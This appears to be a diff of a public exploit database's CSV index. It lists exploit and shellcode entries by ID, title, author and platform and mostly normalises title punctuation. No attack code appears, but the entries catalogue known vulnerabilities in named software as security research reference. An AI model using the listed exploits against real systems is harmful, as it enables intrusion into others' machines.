12839,platforms/php/webapps/12839.txt,"Hexjector <= 1.0.7.2 - Persistent XSS",2010-06-01,hexon,php,webapps,0 12839,platforms/php/webapps/12839.txt,"Hexjector <= 1.0.7.2 - Persistent XSS",2010-06-01,hexon,php,webapps,0
12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection Vulnerability",2010-06-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection Vulnerability",2010-06-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret (SQL Injection)",2010-06-01,Neuromancer,asp,webapps,0 12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret (SQL Injection)",2010-06-01,Neuromancer,asp,webapps,0
@ -11984,7 +11984,7 @@ id,file,description,date,author,platform,type,port
13503,platforms/unixware/shellcode/13503.txt,"Unixware execve /bin/sh 95 bytes",2004-09-26,K2,unixware,shellcode,0 13503,platforms/unixware/shellcode/13503.txt,"Unixware execve /bin/sh 95 bytes",2004-09-26,K2,unixware,shellcode,0
13504,platforms/win32/shellcode/13504.asm,"Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs",2009-07-27,Skylined,win32,shellcode,0 13504,platforms/win32/shellcode/13504.asm,"Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs",2009-07-27,Skylined,win32,shellcode,0
13505,platforms/win32/shellcode/13505.c,"win32/xp sp2 (En) cmd.exe 23 bytes",2009-07-17,Stack,win32,shellcode,0 13505,platforms/win32/shellcode/13505.c,"win32/xp sp2 (En) cmd.exe 23 bytes",2009-07-17,Stack,win32,shellcode,0
18615,platforms/windows/dos/18615.py,"TypesoftFTP Server 1.1 - Remote DoS (APPE)",2012-03-17,"brock haun",windows,dos,0 18615,platforms/windows/dos/18615.py,"TYPSoft FTP Server 1.1 - Remote DoS (APPE)",2012-03-17,"brock haun",windows,dos,0
18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
18594,platforms/php/webapps/18594.txt,"Simple Posting System Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18594,platforms/php/webapps/18594.txt,"Simple Posting System Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
13507,platforms/win32/shellcode/13507.txt,"win32 SEH omelet shellcode 0.1",2009-03-16,Skylined,win32,shellcode,0 13507,platforms/win32/shellcode/13507.txt,"win32 SEH omelet shellcode 0.1",2009-03-16,Skylined,win32,shellcode,0
@ -12455,7 +12455,7 @@ id,file,description,date,author,platform,type,port
14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller Cross-Site Scripting Vulnerabilities",2010-07-02,Sangteamtham,php,webapps,0 14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller Cross-Site Scripting Vulnerabilities",2010-07-02,Sangteamtham,php,webapps,0
14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection Vulnerability",2010-07-01,"Salvatore Fresta",php,webapps,0 14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection Vulnerability",2010-07-01,"Salvatore Fresta",php,webapps,0
14164,platforms/php/webapps/14164.txt,"iScripts CyberMatch 1.0 - Blind SQL Injection Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 14164,platforms/php/webapps/14164.txt,"iScripts CyberMatch 1.0 - Blind SQL Injection Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0
14160,platforms/php/webapps/14160.txt,"InterScan Web Security 5.0 Permanent XSS",2010-07-01,"Ivan Huertas",php,webapps,0 14160,platforms/php/webapps/14160.txt,"InterScan Web Security 5.0 - Permanent XSS",2010-07-01,"Ivan Huertas",php,webapps,0
14177,platforms/linux/webapps/14177.txt,"Xplico 0.5.7 - (add.ctp) Remote XSS Vulnerability",2010-07-02,"Marcos Garcia and Maximiliano Soler",linux,webapps,0 14177,platforms/linux/webapps/14177.txt,"Xplico 0.5.7 - (add.ctp) Remote XSS Vulnerability",2010-07-02,"Marcos Garcia and Maximiliano Soler",linux,webapps,0
14162,platforms/php/webapps/14162.txt,"iScripts EasySnaps 2.0 - Multiple SQL Injection Vulnerabilities",2010-07-01,"Salvatore Fresta",php,webapps,0 14162,platforms/php/webapps/14162.txt,"iScripts EasySnaps 2.0 - Multiple SQL Injection Vulnerabilities",2010-07-01,"Salvatore Fresta",php,webapps,0
14176,platforms/php/webapps/14176.c,"iScripts SocialWare 2.2.x - Arbitrary File Upload Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 14176,platforms/php/webapps/14176.c,"iScripts SocialWare 2.2.x - Arbitrary File Upload Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0
@ -12492,7 +12492,7 @@ id,file,description,date,author,platform,type,port
14202,platforms/php/webapps/14202.txt,"iLister Listing Software LFI Vulnerability",2010-07-04,Sid3^effects,php,webapps,0 14202,platforms/php/webapps/14202.txt,"iLister Listing Software LFI Vulnerability",2010-07-04,Sid3^effects,php,webapps,0
14203,platforms/php/webapps/14203.txt,"TCW PHP Album Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14203,platforms/php/webapps/14203.txt,"TCW PHP Album Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability",2010-07-04,RoAd_KiLlEr,php,webapps,0 14207,platforms/php/webapps/14207.txt,"Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability",2010-07-04,RoAd_KiLlEr,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla Front-edit Address Book Component (com_addressbook) Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0 14210,platforms/php/webapps/14210.txt,"Joomla Front-edit Address Book Component (com_addressbook) Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
@ -12675,8 +12675,8 @@ id,file,description,date,author,platform,type,port
14433,platforms/windows/local/14433.pl,"ZipCentral (.zip) Buffer Overflow (SEH)",2010-07-21,"Jiten Pathy",windows,local,0 14433,platforms/windows/local/14433.pl,"ZipCentral (.zip) Buffer Overflow (SEH)",2010-07-21,"Jiten Pathy",windows,local,0
14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME (welcome.php id) Blind SQL Injection Vulnerability",2010-07-22,JosS,php,webapps,0 14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME (welcome.php id) Blind SQL Injection Vulnerability",2010-07-22,JosS,php,webapps,0
14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability",2010-07-22,JosS,php,webapps,0 14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability",2010-07-22,JosS,php,webapps,0
14437,platforms/php/webapps/14437.txt,"Free PHP photo gallery script Remote Command Execution Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0 14437,platforms/php/webapps/14437.txt,"Free PHP photo gallery script - Remote Command Execution Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0
14438,platforms/php/webapps/14438.txt,"Free PHP photo gallery script Remote File inclusion Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0 14438,platforms/php/webapps/14438.txt,"Free PHP photo gallery script - Remote File inclusion Vulnerability",2010-07-22,"ViRuS Qalaa",php,webapps,0
14439,platforms/php/webapps/14439.txt,"phpBazar admin Information Disclosure Vulnerability",2010-07-22,Net_Spy,php,webapps,0 14439,platforms/php/webapps/14439.txt,"phpBazar admin Information Disclosure Vulnerability",2010-07-22,Net_Spy,php,webapps,0
14440,platforms/php/webapps/14440.txt,"PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass Vulnerability)",2010-07-22,Silic0n,php,webapps,0 14440,platforms/php/webapps/14440.txt,"PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass Vulnerability)",2010-07-22,Silic0n,php,webapps,0
14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection Vulnerability",2010-07-22,H-SK33PY,php,webapps,0 14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection Vulnerability",2010-07-22,H-SK33PY,php,webapps,0
@ -12751,7 +12751,7 @@ id,file,description,date,author,platform,type,port
14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 aswFW.sys kernel driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0 14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 aswFW.sys kernel driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0
14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Include Vulnerability",2010-08-03,eidelweiss,php,webapps,0 14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Include Vulnerability",2010-08-03,eidelweiss,php,webapps,0
14538,platforms/ios/local/14538.txt,"Apple iOS pdf Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0 14538,platforms/ios/local/14538.txt,"Apple iOS pdf Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0
14539,platforms/windows/remote/14539.html,"FathFTP 1.8 (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0 14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0
14536,platforms/hardware/remote/14536.txt,"Unauthorized Access to Root NFS Export on EMC Celerra NAS Appliance",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0 14536,platforms/hardware/remote/14536.txt,"Unauthorized Access to Root NFS Export on EMC Celerra NAS Appliance",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0
14537,platforms/multiple/dos/14537.txt,"Oracle MySQL 'ALTER DATABASE' Remote Denial of Service Vulnerability",2010-08-03,"Shane Bester",multiple,dos,0 14537,platforms/multiple/dos/14537.txt,"Oracle MySQL 'ALTER DATABASE' Remote Denial of Service Vulnerability",2010-08-03,"Shane Bester",multiple,dos,0
14558,platforms/php/webapps/14558.txt,"sX-Shop Multiple SQL Injection Vulnerabilities",2010-08-05,CoBRa_21,php,webapps,0 14558,platforms/php/webapps/14558.txt,"sX-Shop Multiple SQL Injection Vulnerabilities",2010-08-05,CoBRa_21,php,webapps,0
@ -12761,8 +12761,8 @@ id,file,description,date,author,platform,type,port
14566,platforms/windows/local/14566.c,"Microsoft Windows - Win32k.sys Driver _CreateDIBPalette()_ Buffer Overflow",2010-08-06,Arkon,windows,local,0 14566,platforms/windows/local/14566.c,"Microsoft Windows - Win32k.sys Driver _CreateDIBPalette()_ Buffer Overflow",2010-08-06,Arkon,windows,local,0
14547,platforms/windows/remote/14547.txt,"HP OpenView NNM 7.53 OvJavaLocale - Buffer Overflow Vulnerability",2010-08-03,"Nahuel Riva",windows,remote,0 14547,platforms/windows/remote/14547.txt,"HP OpenView NNM 7.53 OvJavaLocale - Buffer Overflow Vulnerability",2010-08-03,"Nahuel Riva",windows,remote,0
14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0
14552,platforms/windows/remote/14552.html,"FathFTP 1.8 (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14552,platforms/windows/remote/14552.html,"FathFTP 1.8 - (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0
14553,platforms/windows/remote/14553.html,"FathFTP 1.8 (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0 14553,platforms/windows/remote/14553.html,"FathFTP 1.8 - (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0
14557,platforms/php/webapps/14557.txt,"sX-Shop (view_image.php) SQL Injection Vulnerability",2010-08-05,secret,php,webapps,0 14557,platforms/php/webapps/14557.txt,"sX-Shop (view_image.php) SQL Injection Vulnerability",2010-08-05,secret,php,webapps,0
14555,platforms/windows/dos/14555.py,"Mediamonkey 3.2.1.1297 - DoS PoC",2010-08-05,anonymous,windows,dos,0 14555,platforms/windows/dos/14555.py,"Mediamonkey 3.2.1.1297 - DoS PoC",2010-08-05,anonymous,windows,dos,0
14556,platforms/php/webapps/14556.txt,"Nuked-Klan Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0 14556,platforms/php/webapps/14556.txt,"Nuked-Klan Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0
@ -12796,7 +12796,7 @@ id,file,description,date,author,platform,type,port
14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0
14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0
14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit (0day)",2010-08-10,sud0,windows,remote,0 14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit (0day)",2010-08-10,sud0,windows,remote,0
14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 SEH Buffer Overflow PoC",2010-08-10,anonymous,windows,dos,0 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow PoC",2010-08-10,anonymous,windows,dos,0
14602,platforms/multiple/remote/14602.txt,"Play! Framework <= 1.0.3.1 - Directory Transversal Vulnerability",2010-08-10,kripthor,multiple,remote,0 14602,platforms/multiple/remote/14602.txt,"Play! Framework <= 1.0.3.1 - Directory Transversal Vulnerability",2010-08-10,kripthor,multiple,remote,0
14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0 14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0
14604,platforms/windows/remote/14604.py,"Easy FTP - BoF Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 14604,platforms/windows/remote/14604.py,"Easy FTP - BoF Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0
@ -12811,7 +12811,7 @@ id,file,description,date,author,platform,type,port
14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Include Vulnerability",2010-08-11,Offensive,php,webapps,0 14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Include Vulnerability",2010-08-11,Offensive,php,webapps,0
14615,platforms/php/webapps/14615.txt,"phpMUR Remote File Disclosure Vulnerability",2010-08-11,Offensive,php,webapps,0 14615,platforms/php/webapps/14615.txt,"phpMUR Remote File Disclosure Vulnerability",2010-08-11,Offensive,php,webapps,0
14618,platforms/php/webapps/14618.txt,"SaurusCMS 4.7.0 - Remote File Inclusion Vulnerability",2010-08-11,LoSt.HaCkEr,php,webapps,0 14618,platforms/php/webapps/14618.txt,"SaurusCMS 4.7.0 - Remote File Inclusion Vulnerability",2010-08-11,LoSt.HaCkEr,php,webapps,0
14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0 14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 - webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0
14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0
14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0 14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0
14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdiskyou,php,webapps,0 14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdiskyou,php,webapps,0
@ -12837,7 +12837,7 @@ id,file,description,date,author,platform,type,port
14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdiskyou,windows,dos,0 14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdiskyou,windows,dos,0
14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion Vulnerability",2010-08-15,MoDaMeR,php,webapps,0 14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion Vulnerability",2010-08-15,MoDaMeR,php,webapps,0
14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0 14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0
14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple XSS/CSRF Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0 14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple XSS/CSRF Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
14654,platforms/php/webapps/14654.php,"CMSQLite <= 1.2 & CMySQLite <= 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0 14654,platforms/php/webapps/14654.php,"CMSQLite <= 1.2 & CMySQLite <= 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0
14655,platforms/php/webapps/14655.txt,"Joomla Component (com_equipment) SQL Injection Vulnerability",2010-08-16,Forza-Dz,php,webapps,0 14655,platforms/php/webapps/14655.txt,"Joomla Component (com_equipment) SQL Injection Vulnerability",2010-08-16,Forza-Dz,php,webapps,0
@ -13196,7 +13196,7 @@ id,file,description,date,author,platform,type,port
15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Vulnerability File Upload CSRF",2010-09-30,Abysssec,asp,webapps,0 15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Vulnerability File Upload CSRF",2010-09-30,Abysssec,asp,webapps,0
15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0
15163,platforms/php/webapps/15163.rb,"Joomla JE Directory Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0 15163,platforms/php/webapps/15163.rb,"Joomla JE Directory Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0
15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 Shell Upload Vulnerability",2010-09-30,"Jeff Channell",php,webapps,0 15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 - Shell Upload Vulnerability",2010-09-30,"Jeff Channell",php,webapps,0
15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0 15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0
15166,platforms/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion Vulnerability",2010-10-01,LiquidWorm,php,webapps,0 15166,platforms/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion Vulnerability",2010-10-01,LiquidWorm,php,webapps,0
15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,kingcope,windows,dos,0 15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,kingcope,windows,dos,0
@ -13255,7 +13255,7 @@ id,file,description,date,author,platform,type,port
15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0 15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
15602,platforms/php/webapps/15602.txt,"PHPMotion FCKeditor File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0 15602,platforms/php/webapps/15602.txt,"PHPMotion FCKeditor File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 and 2.02 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 - 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0
15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0
15231,platforms/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow Exploit",2010-10-11,"xsploited security",windows,remote,0 15231,platforms/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow Exploit",2010-10-11,"xsploited security",windows,remote,0
@ -13264,7 +13264,7 @@ id,file,description,date,author,platform,type,port
15234,platforms/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure Vulnerability",2010-10-11,"John Leitch",php,webapps,0 15234,platforms/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure Vulnerability",2010-10-11,"John Leitch",php,webapps,0
15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP Exploit",2010-10-11,mr_me,windows,remote,0 15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP Exploit",2010-10-11,mr_me,windows,remote,0
15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
15607,platforms/php/webapps/15607.txt,"WSN Links SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0 15607,platforms/php/webapps/15607.txt,"WSN Links - SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0
15237,platforms/php/webapps/15237.txt,"AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)",2010-10-12,v3n0m,php,webapps,0 15237,platforms/php/webapps/15237.txt,"AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)",2010-10-12,v3n0m,php,webapps,0
15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0
15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0 15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0
@ -13369,7 +13369,7 @@ id,file,description,date,author,platform,type,port
15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0
15358,platforms/windows/remote/15358.txt,"SmallFTPD 1.0.3 - Remote Directory Traversal Vulnerability",2010-10-31,"Yakir Wizman",windows,remote,0 15358,platforms/windows/remote/15358.txt,"SmallFTPD 1.0.3 - Remote Directory Traversal Vulnerability",2010-10-31,"Yakir Wizman",windows,remote,0
15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 PHP Code Injection Vulnerability",2010-10-31,Beach,php,webapps,0 15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection Vulnerability",2010-10-31,Beach,php,webapps,0
15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 PHP Code Injection Vulnerability",2010-10-31,Beach,php,webapps,0 15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 PHP Code Injection Vulnerability",2010-10-31,Beach,php,webapps,0
15366,platforms/php/webapps/15366.txt,"Joomla Flip Wall Component (com_flipwall) SQL Injection Vulnerability",2010-10-31,FL0RiX,php,webapps,0 15366,platforms/php/webapps/15366.txt,"Joomla Flip Wall Component (com_flipwall) SQL Injection Vulnerability",2010-10-31,FL0RiX,php,webapps,0
15367,platforms/php/webapps/15367.txt,"Joomla Sponsor Wall Component (com_sponsorwall) SQL Injection Vulnerability",2010-10-31,FL0RiX,php,webapps,0 15367,platforms/php/webapps/15367.txt,"Joomla Sponsor Wall Component (com_sponsorwall) SQL Injection Vulnerability",2010-10-31,FL0RiX,php,webapps,0
@ -13547,10 +13547,10 @@ id,file,description,date,author,platform,type,port
15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler - Privilege Escalation (0day)",2010-11-20,webDEViL,windows,local,0 15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler - Privilege Escalation (0day)",2010-11-20,webDEViL,windows,local,0
15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0 15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0
15614,platforms/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15614,platforms/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0
